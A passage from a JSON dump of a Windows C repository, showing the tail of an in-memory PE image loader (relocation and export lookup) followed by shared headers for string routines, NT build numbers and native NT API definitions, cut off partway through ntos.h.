           }\n        }\n\n        // reloc image\n        dosh = (PIMAGE_DOS_HEADER)exeBuffer;\n        fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);\n        popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));\n\n        if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)\n            if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)\n            {\n                rel = (PIMAGE_BASE_RELOCATION)((PBYTE)exeBuffer + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\n                rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\n                delta = (DWORD_PTR)exeBuffer - popth->ImageBase;\n\n                c = 0;\n                while (c < rsz) {\n                    p = sizeof(IMAGE_BASE_RELOCATION);\n                    chains = (LPWORD)((PBYTE)rel + p);\n\n                    while (p < rel->SizeOfBlock) {\n\n                        switch (*chains >> 12) {\n                        case IMAGE_REL_BASED_HIGHLOW:\n                            *(LPDWORD)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;\n                            break;\n                        case IMAGE_REL_BASED_DIR64:\n                            *(PULONGLONG)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff)) += delta;\n                            break;\n                        }\n\n                        chains++;\n                        p += sizeof(WORD);\n                    }\n\n                    c += rel->SizeOfBlock;\n                    rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);\n                }\n            }\n\n        return exeBuffer;\n\n    } while (FALSE);\n\n    return NULL;\n}\n\nLPVOID PELoaderGetProcAddress(\n    _In_ LPVOID ImageBase,\n    _In_ PCHAR RoutineName\n)\n{\n    USHORT OrdinalIndex;\n    LONG Result;\n    PIMAGE_EXPORT_DIRECTORY ExportDirectory = 
NULL;\n    PULONG NameTableBase, FunctionTableBase;\n    PUSHORT NameOrdinalTableBase;\n    PCHAR CurrentName;\n    ULONG High, Low, Middle = 0;\n    ULONG ExportDirRVA, ExportDirSize;\n    ULONG FunctionRVA;\n\n    union {\n        PIMAGE_NT_HEADERS64 nt64;\n        PIMAGE_NT_HEADERS32 nt32;\n        PIMAGE_NT_HEADERS nt;\n    } NtHeaders;\n\n    if (ImageBase == NULL || RoutineName == NULL) {\n        SetLastError(ERROR_INVALID_PARAMETER);\n        return NULL;\n    }\n\n    NtHeaders.nt = RtlImageNtHeader(ImageBase);\n    if (NtHeaders.nt == NULL) {\n        SetLastError(ERROR_INVALID_PARAMETER);\n        return NULL;\n    }\n\n    if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) {\n        ExportDirRVA = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\n        ExportDirSize = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;\n    }\n    else if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) {\n        ExportDirRVA = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\n        ExportDirSize = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;\n    }\n    else {\n        SetLastError(ERROR_EXE_MACHINE_TYPE_MISMATCH);\n        return NULL;\n    }\n\n    if (ExportDirRVA == 0 || ExportDirSize == 0) {\n        SetLastError(ERROR_PROC_NOT_FOUND);\n        return NULL;\n    }\n\n    ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer((ULONG_PTR)ImageBase, ExportDirRVA);\n    NameTableBase = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNames);\n    NameOrdinalTableBase = (PUSHORT)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNameOrdinals);\n    FunctionTableBase = (PULONG)((ULONG_PTR)ImageBase + ExportDirectory->AddressOfFunctions);\n\n    if (ExportDirectory->NumberOfNames == 0) {\n        SetLastError(ERROR_PROC_NOT_FOUND);\n        return 
NULL;\n    }\n\n    Low = 0;\n    High = ExportDirectory->NumberOfNames - 1;\n\n    while (Low <= High) {\n        Middle = Low + (High - Low) / 2;\n        CurrentName = (PCHAR)RtlOffsetToPointer((ULONG_PTR)ImageBase, NameTableBase[Middle]);\n        Result = _strcmp_a(RoutineName, CurrentName);\n        if (Result == 0) {\n            OrdinalIndex = NameOrdinalTableBase[Middle];\n            if (OrdinalIndex >= ExportDirectory->NumberOfFunctions) {\n                SetLastError(ERROR_PROC_NOT_FOUND);\n                return NULL;\n            }\n            FunctionRVA = FunctionTableBase[OrdinalIndex];\n            if (FunctionRVA == 0) {\n                SetLastError(ERROR_PROC_NOT_FOUND);\n                return NULL;\n            }\n            return (LPVOID)RtlOffsetToPointer((ULONG_PTR)ImageBase, FunctionRVA);\n        }\n        if (Result < 0) {\n            if (Middle == 0) break;\n            High = Middle - 1;\n        }\n        else {\n            Low = Middle + 1;\n        }\n\n    }\n\n    SetLastError(ERROR_PROC_NOT_FOUND);\n    return NULL;\n}\n"
  },
  {
    "path": "Source/Shared/ldr.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2017\n*\n*  TITLE:       LDR.H\n*\n*  VERSION:     2.72\n*\n*  DATE:        26 May 2017\n*\n*  Common header file for PE loader unit.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nLPVOID PELoaderLoadImage(\n    _In_ LPVOID Buffer,\n    _Out_opt_ PDWORD SizeOfImage);\n\nLPVOID PELoaderGetProcAddress(\n    _In_ LPVOID ImageBase,\n    _In_ PCHAR RoutineName);\n"
  },
  {
    "path": "Source/Shared/libinc.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018\n*\n*  TITLE:       LIBINC.H\n*\n*  VERSION:     1.0.02\n*\n*  DATE:        18 Nov 2018\n*\n*  Master header file for C Runtime libraries include.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#if defined (_MSC_VER)\n    #if (_MSC_VER >= 1900) //VS15, 17 etc\n        #ifdef _DEBUG\n            #pragma comment(lib, \"vcruntimed.lib\")\n            #pragma comment(lib, \"ucrtd.lib\")\n        #else\n            #pragma comment(lib, \"libucrt.lib\")\n            #pragma comment(lib, \"libvcruntime.lib\")\n        #endif\n    #endif\n#endif\n"
  },
  {
    "path": "Source/Shared/minirtl.h",
    "content": "/*\nModule name:\n\tminirtl.h\n\nDescription:\n\theader for string handling and conversion routines\n\nDate:\n\t4 Oct 2020\n*/\n\n#pragma once\n\n#ifndef _MINIRTL_\n#define _MINIRTL_\n\n// string copy/concat/length\n\nchar *_strend_a(const char *s);\nwchar_t *_strend_w(const wchar_t *s);\n\nchar *_strcpy_a(char *dest, const char *src);\nwchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strcat_a(char *dest, const char *src);\nwchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);\n\nchar *_strcpyn_a(char* dest, const char* src, size_t n);\nwchar_t *_strcpyn_w(wchar_t* dest, const wchar_t* src, size_t n);\n\nsize_t _strlen_a(const char *s);\nsize_t _strlen_w(const wchar_t *s);\n\n// comparing\n\nint _strcmp_a(const char *s1, const char *s2);\nint _strcmp_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmp_a(const char *s1, const char *s2, size_t cchars);\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nint _strcmpi_a(const char *s1, const char *s2);\nint _strcmpi_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars);\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nchar *_strstr_a(const char *s, const char *sub_s);\nwchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);\n\nchar *_strstri_a(const char *s, const char *sub_s);\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);\n\nchar *_strchr_a(const char *s, const char ch);\nwchar_t *_strchr_w(const wchar_t *s, const wchar_t ch);\n\n\n// conversion of integer types to string, returning string length\n\nsize_t ultostr_a(unsigned long x, char *s);\nsize_t ultostr_w(unsigned long x, wchar_t *s);\n\nsize_t ultohex_a(unsigned long x, char *s);\nsize_t ultohex_w(unsigned long x, wchar_t *s);\n\nsize_t 
itostr_a(int x, char *s);\nsize_t itostr_w(int x, wchar_t *s);\n\nsize_t i64tostr_a(signed long long x, char *s);\nsize_t i64tostr_w(signed long long x, wchar_t *s);\n\nsize_t u64tostr_a(unsigned long long x, char *s);\nsize_t u64tostr_w(unsigned long long x, wchar_t *s);\n\nsize_t u64tohex_a(unsigned long long x, char *s);\nsize_t u64tohex_w(unsigned long long x, wchar_t *s);\n\n// string to integers conversion\n\nunsigned long strtoul_a(char *s);\nunsigned long strtoul_w(wchar_t *s);\n\nunsigned long long strtou64_a(char *s);\nunsigned long long strtou64_w(wchar_t *s);\n\nunsigned long hextoul_a(char *s);\nunsigned long hextoul_w(wchar_t *s);\n\nint strtoi_a(char *s);\nint strtoi_w(wchar_t *s);\n\nsigned long long strtoi64_a(char *s);\nsigned long long strtoi64_w(wchar_t *s);\n\nunsigned long long hextou64_a(char *s);\nunsigned long long hextou64_w(wchar_t *s);\n\n/* =================================== */\n\n#ifdef UNICODE\n\n#define _strend _strend_w\n#define _strcpy _strcpy_w\n#define _strcat _strcat_w\n#define _strlen _strlen_w\n#define _strncpy _strncpy_w\n#define _strcpyn _strcpyn_w\n\n#define _strcmp _strcmp_w\n#define _strncmp _strncmp_w\n#define _strcmpi _strcmpi_w\n#define _strncmpi _strncmpi_w\n#define _strstr _strstr_w\n#define _strstri _strstri_w\n#define _strchr _strchr_w\n\n#define ultostr ultostr_w\n#define ultohex ultohex_w\n#define itostr itostr_w\n#define i64tostr i64tostr_w\n#define u64tostr u64tostr_w\n#define u64tohex u64tohex_w\n\n#define _strtoul strtoul_w\n#define hextoul hextoul_w\n#define strtoi strtoi_w\n#define strtoi64 strtoi64_w\n#define strtou64 strtou64_w\n#define hextou64 hextou64_w\n\n#else // ANSI\n\n#define _strend _strend_a\n#define _strcpy _strcpy_a\n#define _strcat _strcat_a\n#define _strlen _strlen_a\n#define _strncpy _strncpy_a\n#define _strcpyn _strcpyn_a\n\n#define _strcmp _strcmp_a\n#define _strncmp _strncmp_a\n#define _strcmpi _strcmpi_a\n#define _strncmpi _strncmpi_a\n#define _strstr _strstr_a\n#define _strstri 
_strstri_a\n#define _strchr _strchr_a\n\n#define ultostr ultostr_a\n#define ultohex ultohex_a\n#define itostr itostr_a\n#define i64tostr i64tostr_a\n#define u64tostr u64tostr_a\n#define u64tohex u64tohex_a\n\n#define _strtoul strtoul_a\n#define hextoul hextoul_a\n#define strtoi strtoi_a\n#define strtoi64 strtoi64_a\n#define strtou64 strtou64_a\n#define hextou64 hextou64_a\n\n#endif\n\n#endif /* _MINIRTL_ */\n"
  },
  {
    "path": "Source/Shared/ntos/ntbuilds.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2021 - 2025\n*\n*  TITLE:       NTBUILDS.H\n*\n*  VERSION:     1.28\n*\n*  DATE:        18 Sep 2025\n*\n*  Windows NT builds definition file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n//\n// Defines for Major Windows NT release builds\n//\n\n// Windows 7 RTM\n#define NT_WIN7_RTM             7600\n\n// Windows 7 SP1\n#define NT_WIN7_SP1             7601\n\n// Windows 8 RTM\n#define NT_WIN8_RTM             9200\n\n// Windows 8.1\n#define NT_WIN8_BLUE            9600\n\n// Windows 10 TH1\n#define NT_WIN10_THRESHOLD1     10240\n\n// Windows 10 TH2\n#define NT_WIN10_THRESHOLD2     10586\n\n// Windows 10 RS1\n#define NT_WIN10_REDSTONE1      14393\n\n// Windows 10 RS2\n#define NT_WIN10_REDSTONE2      15063\n\n// Windows 10 RS3\n#define NT_WIN10_REDSTONE3      16299\n\n// Windows 10 RS4\n#define NT_WIN10_REDSTONE4      17134\n\n// Windows 10 RS5\n#define NT_WIN10_REDSTONE5      17763\n\n// Windows 10 19H1\n#define NT_WIN10_19H1           18362\n\n// Windows 10 19H2\n#define NT_WIN10_19H2           18363\n\n// Windows 10 20H1\n#define NT_WIN10_20H1           19041\n\n// Windows 10 20H2\n#define NT_WIN10_20H2           19042\n\n// Windows 10 21H1\n#define NT_WIN10_21H1           19043\n\n// Windows 10 21H2\n#define NT_WIN10_21H2           19044\n\n// Windows 10 22H2\n#define NT_WIN10_22H2           19045\n\n// Windows Server 2022\n#define NT_WINSRV_21H1          20348\n\n// Windows 11 21H2\n#define NT_WIN11_21H2           22000\n\n// Windows 11 22H2\n#define NT_WIN11_22H2           22621\n\n// Windows 11 23H2\n#define NT_WIN11_23H2           22631\n\n// Windows 
11 24H2\n#define NT_WIN11_24H2           26100\n\n// Windows 11 25H2\n#define NT_WIN11_25H2           26200\n\n// Windows 11 Active Development Branch\n#define NT_WIN11_ADB            27943\n"
  },
  {
    "path": "Source/Shared/ntos/ntos.h",
    "content": "/************************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2025\n*  Translated from Microsoft sources/debugger or mentioned elsewhere.\n*\n*  TITLE:       NTOS.H\n*\n*  VERSION:     1.237\n*\n*  DATE:        22 Aug 2025\n*\n*  Common header file for the ntos API functions and definitions.\n*\n*  Only projects required API/definitions.\n*\n*  Depends on:    Windows.h\n*                 NtStatus.h\n*\n*  Include:       Windows.h\n*                 NtStatus.h\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n************************************************************************************/\n\n#if defined (_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#pragma warning(push)\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int\n\n#ifndef NTOS_RTL\n#define NTOS_RTL\n\n//\n// NTOS_RTL HEADER BEGIN\n//\n\n//\n// Enable LIST_ENTRY macroses.\n//\n#define NTOS_ENABLE_LIST_ENTRY_MACRO\n\n#if defined(__cplusplus)\n\n#ifndef MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS\n#define MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 0\n#endif\n\nextern \"C\" {\n#endif\n\n#pragma comment(lib, \"ntdll.lib\")\n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 0x1000ull\n#endif\n\n#ifndef ABSOLUTE_TIME\n#define ABSOLUTE_TIME(wait) (wait)\n#endif\n\n#ifndef RELATIVE_TIME\n#define RELATIVE_TIME(wait) (-(wait))\n#endif\n\n#ifndef NANOSECONDS\n#define NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)\n#endif\n\n#ifndef MICROSECONDS\n#define MICROSECONDS(micros) (((signed __int64)(micros)) * NANOSECONDS(1000L))\n#endif\n\n#ifndef MILLISECONDS\n#define 
MILLISECONDS(milli) (((signed __int64)(milli)) * MICROSECONDS(1000L))\n#endif\n\n#ifndef SECONDS\n#define SECONDS(seconds) (((signed __int64)(seconds)) * MILLISECONDS(1000L))\n#endif\n\n#ifndef POI //poi-poi\n#define POI(addr) *(ULONG *)(addr)\n#endif\n\ntypedef char CCHAR;\ntypedef unsigned char UCHAR;\ntypedef CCHAR KPROCESSOR_MODE;\ntypedef UCHAR KIRQL;\ntypedef KIRQL *PKIRQL;\ntypedef ULONG CLONG;\ntypedef LONG KPRIORITY;\ntypedef short CSHORT;\ntypedef ULONGLONG REGHANDLE, *PREGHANDLE;\ntypedef PVOID *PDEVICE_MAP;\ntypedef PVOID PHEAD;\ntypedef PVOID PEJOB;\ntypedef PVOID PKTHREAD;\ntypedef struct _IO_TIMER* PIO_TIMER;\ntypedef LARGE_INTEGER PHYSICAL_ADDRESS;\ntypedef struct _EJOB* PESILO;\n\n#ifndef _WIN32_WINNT_WIN10\n#define _WIN32_WINNT_WIN10 0x0A00\n#endif\n#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)\ntypedef PVOID PMEM_EXTENDED_PARAMETER;\n#endif\n\n#ifndef IN_REGION\n#define IN_REGION(x, Base, Size) ( \\\n    (((ULONG_PTR)(Base) + (ULONG_PTR)(Size)) > (ULONG_PTR)(Base)) && \\\n    /* x within [Base, Base+Size) */ \\\n    (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && ((ULONG_PTR)(x) < ((ULONG_PTR)(Base) + (ULONG_PTR)(Size)))))\n#endif\n\n#define PE_SIGNATURE_SIZE           4\n#ifndef RTL_MEG\n#define RTL_MEG                     (1024UL * 1024UL)\n#endif\n#ifndef RTLP_IMAGE_MAX_DOS_HEADER\n#define RTLP_IMAGE_MAX_DOS_HEADER   (256UL * RTL_MEG)\n#endif\n#ifndef MM_SIZE_OF_LARGEST_IMAGE\n#define MM_SIZE_OF_LARGEST_IMAGE    ((ULONG)0x77000000)\n#endif\n#ifndef MM_MAXIMUM_IMAGE_HEADER\n#define MM_MAXIMUM_IMAGE_HEADER     (2 * PAGE_SIZE)\n#endif\n#ifndef MM_MAXIMUM_IMAGE_SECTIONS\n#define MM_MAXIMUM_IMAGE_SECTIONS                       \\\n     ((MM_MAXIMUM_IMAGE_HEADER - (PAGE_SIZE + sizeof(IMAGE_NT_HEADERS))) /  \\\n            sizeof(IMAGE_SECTION_HEADER))\n#endif\n\n//\n// Define alignment macros to align structure sizes and pointers up and down.\n//\n\n#ifndef ALIGN_UP_TYPE\n#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 
1))\n#endif\n\n#ifndef ALIGN_UP\n#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))\n#endif\n\n#ifndef ALIGN_DOWN_TYPE\n#define ALIGN_DOWN_TYPE(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))\n#endif\n\n#ifndef ALIGN_DOWN\n#define ALIGN_DOWN(Address, Type) ALIGN_DOWN_TYPE(Address, sizeof(Type))\n#endif\n\n#ifndef ALIGN_UP_BY\n#define ALIGN_UP_BY(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))\n#endif\n\n#ifndef ALIGN_DOWN_BY\n#define ALIGN_DOWN_BY(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))\n#endif\n\n#ifndef ALIGN_UP_POINTER_BY\n#define ALIGN_UP_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_UP_BY(Pointer, Align))\n#endif\n\n#ifndef ALIGN_DOWN_POINTER_BY\n#define ALIGN_DOWN_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_DOWN_BY(Pointer, Align))\n#endif\n\n#ifndef ALIGN_UP_POINTER\n#define ALIGN_UP_POINTER(Pointer, Type) ((PVOID)ALIGN_UP(Pointer, Type))\n#endif\n\n#ifndef ALIGN_DOWN_POINTER\n#define ALIGN_DOWN_POINTER(Pointer, Type) ((PVOID)ALIGN_DOWN(Pointer, Type))\n#endif\n\n#ifndef ARGUMENT_PRESENT\n#define ARGUMENT_PRESENT(ArgumentPointer)    (\\\n    (CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) )\n#endif\n\n#ifndef LOGICAL\n#define LOGICAL ULONG\n#endif\n\n#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)\n#define ZwCurrentProcess() NtCurrentProcess()\n#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2)\n#define ZwCurrentThread() NtCurrentThread()\n#define NtCurrentSession() ((HANDLE)(LONG_PTR)-3)\n#define ZwCurrentSession() NtCurrentSession()\n\n//Valid Only for Windows 8+\n#define NtCurrentProcessToken() ((HANDLE)(LONG_PTR)-4) \n#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)\n#define NtCurrentThreadEffectiveToken() ((HANDLE)(LONG_PTR)-6) //GetCurrentThreadEffectiveToken\n\nenum _KPROCESSOR_MODE {\n    KernelMode = 0,\n    UserMode,\n    MaximumMode\n};\n\n//\n// ntdef.h begin\n//\n#ifndef RTL_CONSTANT_STRING\nchar _RTL_CONSTANT_STRING_type_check(const void *s);\n#define 
_RTL_CONSTANT_STRING_remove_const_macro(s) (s)\n#define RTL_CONSTANT_STRING(s) \\\n{ \\\n    sizeof( s ) - sizeof( (s)[0] ), \\\n    sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \\\n    _RTL_CONSTANT_STRING_remove_const_macro(s) \\\n}\n#endif\n\n#ifndef RTL_CONSTANT_OBJECT_ATTRIBUTES\n#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \\\n    { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }\n#endif\n\n// This synonym is more appropriate for initializing what isn't actually const.\n#ifndef RTL_INIT_OBJECT_ATTRIBUTES\n#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)\n#endif\n\n//\n// ntdef.h end\n//\n#ifndef RtlOffsetToPointer\n#define RtlOffsetToPointer(Base, Offset)  ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset))  ))\n#endif\n\n#ifndef RtlPointerToOffset\n#define RtlPointerToOffset(Base, Pointer)  ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base))  ))\n#endif\n\n//\n// Valid values for the OBJECT_ATTRIBUTES.Attributes field\n//\n#define OBJ_INHERIT                         0x00000002L\n#define OBJ_PERMANENT                       0x00000010L\n#define OBJ_EXCLUSIVE                       0x00000020L\n#define OBJ_CASE_INSENSITIVE                0x00000040L\n#define OBJ_OPENIF                          0x00000080L\n#define OBJ_OPENLINK                        0x00000100L\n#define OBJ_KERNEL_HANDLE                   0x00000200L\n#define OBJ_FORCE_ACCESS_CHECK              0x00000400L\n#define OBJ_IGNORE_IMPERSONATED_DEVICEMAP   0x00000800L\n#define OBJ_DONT_REPARSE                    0x00001000L\n#define OBJ_VALID_ATTRIBUTES                0x00001FF2L\n\n#define OBJ_PROTECT_CLOSE                   0x00000001L\n#define OBJ_AUDIT_OBJECT_CLOSE              0x00000004L\n\n//\n// Callback Object Rights\n//\n#define CALLBACK_MODIFY_STATE    0x0001\n#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )\n\n//\n// CompositionSurface Access Rights\n//\n#ifndef 
COMPOSITIONSURFACE_READ\n#define COMPOSITIONSURFACE_READ         0x0001L\n#endif\n\n#ifndef COMPOSITIONSURFACE_WRITE\n#define COMPOSITIONSURFACE_WRITE        0x0002L\n#endif\n\n#ifndef COMPOSITIONSURFACE_ALL_ACCESS\n#define COMPOSITIONSURFACE_ALL_ACCESS   (COMPOSITIONSURFACE_READ | COMPOSITIONSURFACE_WRITE)\n#endif\n\n//\n// Debug Object Access Rights\n//\n#define DEBUG_READ_EVENT        (0x0001)\n#define DEBUG_PROCESS_ASSIGN    (0x0002)\n#define DEBUG_SET_INFORMATION   (0x0004)\n#define DEBUG_QUERY_INFORMATION (0x0008)\n#define DEBUG_ALL_ACCESS     (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\\\n                              DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)\n\n//\n// Directory Object Access Rights\n//\n#define DIRECTORY_QUERY                 (0x0001)\n#define DIRECTORY_TRAVERSE              (0x0002)\n#define DIRECTORY_CREATE_OBJECT         (0x0004)\n#define DIRECTORY_CREATE_SUBDIRECTORY   (0x0008)\n#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)\n\n//\n// Event Object Access Rights\n//\n#ifndef EVENT_QUERY_STATE\n#define EVENT_QUERY_STATE       0x0001\n#endif\n\n#ifndef EVENT_MODIFY_STATE      //SDK compatibility\n#define EVENT_MODIFY_STATE      0x0002  \n#endif\n\n#ifndef EVENT_ALL_ACCESS        //SDK compatibility\n#define EVENT_ALL_ACCESS (EVENT_QUERY_STATE | EVENT_MODIFY_STATE | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE)\n#endif\n\n//\n// EventPair Object Access Rights\n//\n#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)\n\n//\n// I/O Completion Object Access Rights\n//\n#define IO_COMPLETION_QUERY_STATE   0x0001\n#define IO_COMPLETION_MODIFY_STATE  0x0002  \n#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) \n\n//\n// KeyedEvent Object Access Rights\n//\n#define KEYEDEVENT_WAIT 0x0001\n#define KEYEDEVENT_WAKE 0x0002\n#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)\n\n//\n// Mutant Object Access Rights\n//\n#ifndef 
MUTANT_QUERY_STATE      //SDK compatibility\n#define MUTANT_QUERY_STATE      0x0001\n#endif\n\n#ifndef MUTANT_ALL_ACCESS //SDK compatibility\n#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)\n#endif\n\n//\n// Port Object Access Rights\n//\n#define PORT_CONNECT (0x0001)\n#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | PORT_CONNECT)\n\n//\n// Filter Port Access Rights\n//\n#define FLT_PORT_CONNECT 0x0001\n#define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT|STANDARD_RIGHTS_ALL)\n\n//\n// Profile Object Access Rights\n//\n#define PROFILE_CONTROL (0x0001)\n#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)\n\n//\n// Semaphore Object Access Rights\n//\n#ifndef SEMAPHORE_QUERY_STATE       //SDK compatibility\n#define SEMAPHORE_QUERY_STATE       0x0001\n#endif\n\n#ifndef SEMAPHORE_MODIFY_STATE      //SDK compatibility\n#define SEMAPHORE_MODIFY_STATE      0x0002 \n#endif\n\n#ifndef SEMAPHORE_ALL_ACCESS //SDK compatibility\n#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|SEMAPHORE_QUERY_STATE|SEMAPHORE_MODIFY_STATE)\n#endif\n\n//\n// Time Object Access rights\n//\n#ifndef TIMER_QUERY_STATE\n#define TIMER_QUERY_STATE 0x0001\n#endif\n\n#ifndef TIMER_MODIFY_STATE\n#define TIMER_MODIFY_STATE 0x0002\n#endif\n\n#ifndef TIMER_ALL_ACCESS\n#define TIMER_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|TIMER_QUERY_STATE|TIMER_MODIFY_STATE)\n#endif\n\n//\n// SymbolicLink Object Access Rights\n//\n#define SYMBOLIC_LINK_QUERY 0x0001\n#define SYMBOLIC_LINK_SET   0x0002\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYMBOLIC_LINK_QUERY)\n#define SYMBOLIC_LINK_ALL_ACCESS_EX (STANDARD_RIGHTS_REQUIRED | 0xFFFF)\n\n//\n// Thread Object Access Rights\n//\n#define THREAD_ALERT   (0x0004)\n\n#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED        0x00000001\n#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH      0x00000002 \n#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER      0x00000004\n#define 
